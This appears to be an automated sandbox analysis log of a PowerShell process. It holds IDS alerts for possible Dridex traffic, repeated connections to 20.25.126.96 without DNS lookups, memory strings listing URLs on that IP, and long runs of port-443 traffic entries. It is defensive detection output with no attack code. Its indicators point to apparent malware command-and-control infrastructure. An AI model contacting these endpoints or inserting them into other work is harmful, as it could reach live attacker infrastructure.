Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50211 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50221 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50224 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50214 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50218 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50227 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50242 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50236 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50196 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50181 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50233 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50208 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50230 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50239 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50248 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50245 -> 20.25.126.96:443

Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96
Source: unknown	TCP traffic detected without corresponding DNS query: 20.25.126.96

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED34717C recv,shutdown,closesocket,

0_2_000001A6ED34717C

Source: powershell.exe, 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: powershell.exe, 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4601032571.000001A6ECC91000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/
Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/?
Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4601032571.000001A6ECC91000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cm
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cm5.126.96/cm
Source: powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cm;
Source: powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cm=
Source: powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cmW
Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cmd
Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cmf
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cmq
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cms
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cmv
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/cmw
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/j
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/m
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/ms
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/ms2
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://20.25.126.96/ngs
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50219
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50212
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50211
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50213
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50222
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50224
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50235
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50241
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50246
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 50196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50183
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
